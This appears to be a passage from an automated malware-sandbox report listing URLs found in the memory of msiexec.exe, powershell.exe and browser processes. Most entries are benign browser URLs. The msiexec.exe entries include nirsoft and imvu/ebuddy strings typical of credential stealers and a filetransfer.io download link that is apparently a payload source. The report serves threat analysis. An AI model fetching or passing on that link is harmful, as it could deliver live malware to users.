              Source: msiexec.exe, 0000000B.00000002.144171415973.0000000002CCC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
              Source: msiexec.exe, 0000000B.00000003.144170842635.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144170955946.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144171023674.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144172323389.00000000031AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: msiexec.exe, 00000004.00000002.148901845750.0000000021E20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 00000004.00000002.148901845750.0000000021E20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: powershell.exe, 00000002.00000002.144018533141.0000000003277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: msiexec.exe, 00000009.00000002.144189871263.0000000002E8F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144118475021.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144079911503.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144080071726.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: Reporting and NEL.20.drString found in binary or memory: https://a.nel.cloudflare.com/report/v3?s=0b6Aifh30%2FgfQaQCMOwZ14uQEQ53jYrfzrDCc10FuTOoqrvbxYTjZLXhH
              Source: chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
              Source: chrome.exe, 00000008.00000002.144255499930.000012AC00030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
              Source: chrome.exe, 00000008.00000002.144262021504.000012AC00D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
              Source: chrome.exe, 00000008.00000002.144255566146.000012AC0005C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
              Source: chrome.exe, 00000008.00000002.144262021504.000012AC00D14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
              Source: Reporting and NEL.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: Reporting and NEL.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingcsp
              Source: Reporting and NEL.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
              Source: powershell.exe, 00000002.00000002.144019020175.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265720
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comse
              Source: Favicons.17.drString found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png
              Source: Favicons.17.drString found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png=
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beastacademy.com/checkout/cart
              Source: chrome.exe, 00000008.00000002.144261441489.000012AC00BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cart.ebay.com/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cart.godaddy.com/go/checkout
              Source: chrome.exe, 00000008.00000002.144263390938.000012AC00F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chat.google.com/b
              Source: 2ae02828-e435-46b5-9a19-380d49c01a41.tmp.20.drString found in binary or memory: https://chrome.cloudflare-dns.com
              Source: chrome.exe, 00000008.00000002.144256031394.000012AC000F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144315499677.0000642800170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
              Source: chrome.exe, 00000008.00000002.144262021504.000012AC00D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260987682.000012AC00AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: chrome.exe, 00000008.00000002.144259219060.000012AC00770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
              Source: chrome.exe, 00000008.00000003.144245340374.000012AC00CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144247795420.000012AC00CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144233363066.000012AC00CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144225139805.000012AC00F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144256031394.000012AC000F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
              Source: chrome.exe, 00000008.00000002.144255400105.000012AC00004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
              Source: chrome.exe, 00000008.00000002.144255400105.000012AC00004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
              Source: chrome.exe, 00000008.00000002.144255441864.000012AC00014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
              Source: chrome.exe, 00000008.00000002.144261607698.000012AC00C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
              Source: chrome.exe, 00000008.00000003.144163182958.000044D8000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144163152168.000044D8000D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
              Source: chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144255441864.000012AC00014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262021504.000012AC00D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259298967.000012AC00795000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144315696749.00006428001C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
              Source: chrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
              Source: chrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
              Source: chrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
              Source: chrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bcr_components/customize_color_s
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
              Source: chrome.exe, 00000008.00000002.144259921127.000012AC0086C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-autofill.googleapis.com/b-
              Source: powershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144233363066.000012AC00CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144316646821.000064280043C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/593024
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/650547
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/655534
              Source: chrome.exe, 00000008.00000003.144233777517.000012AC014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144233553986.000012AC014DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuscochromeextension-pa.googleapis.com/v_turned_down_returns_404/omniboxsuggestions
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuscochromeextension-pa.googleapis.com/v_turned_down_returns_404/omniboxsuggestionsb
              Source: Reporting and NEL.20.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
              Source: chrome.exe, 00000008.00000002.144264367357.000012AC01154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264974668.000012AC01294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
              Source: chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
              Source: chrome.exe, 00000008.00000002.144264933828.000012AC01280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264974668.000012AC01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
              Source: chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
              Source: chrome.exe, 00000008.00000002.144264156374.000012AC01094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264543323.000012AC011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144245913297.000012AC011A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default7
              Source: chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
              Source: chrome.exe, 00000008.00000002.144265403166.000012AC01398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144265017944.000012AC012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264857051.000012AC01250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
              Source: chrome.exe, 00000008.00000002.144264543323.000012AC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
              Source: chrome.exe, 00000008.00000002.144264543323.000012AC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapplt
              Source: chrome.exe, 00000008.00000002.144264156374.000012AC01094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappme_default
              Source: chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000008.00000002.144263481982.000012AC00F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264974668.000012AC01294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
              Source: chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
              Source: chrome.exe, 00000008.00000002.144264156374.000012AC01094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
              Source: chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webappme_default
              Source: chrome.exe, 00000008.00000002.144264156374.000012AC01094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webappr
              Source: chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
              Source: chrome.exe, 00000008.00000002.144264156374.000012AC01094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262967397.000012AC00EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
              Source: chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264933828.000012AC01280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
              Source: chrome.exe, 00000008.00000002.144265313357.000012AC0134C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144265403166.000012AC01398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264933828.000012AC01280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
              Source: chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
              Source: chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144245913297.000012AC011A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000008.00000002.144264543323.000012AC011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144245913297.000012AC011A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaulterr
              Source: chrome.exe, 00000008.00000002.144264156374.000012AC01094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaultt
              Source: chrome.exe, 00000008.00000002.144257554958.000012AC003CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settings
              Source: chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/lfhs=2
              Source: chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
              Source: chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
              Source: Web Data.17.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmp, Web Data.17.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
              Source: Web Data.17.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: msiexec.exe, 00000004.00000003.144376861712.0000000005486000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.0000000005486000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377806392.0000000005486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/
              Source: msiexec.exe, 00000004.00000003.144376861712.0000000005461000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148891816559.000000000541A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144376861712.0000000005486000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.0000000005486000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148891816559.0000000005462000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148898809549.0000000020F40000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377806392.0000000005486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/kpFdlS7h/download
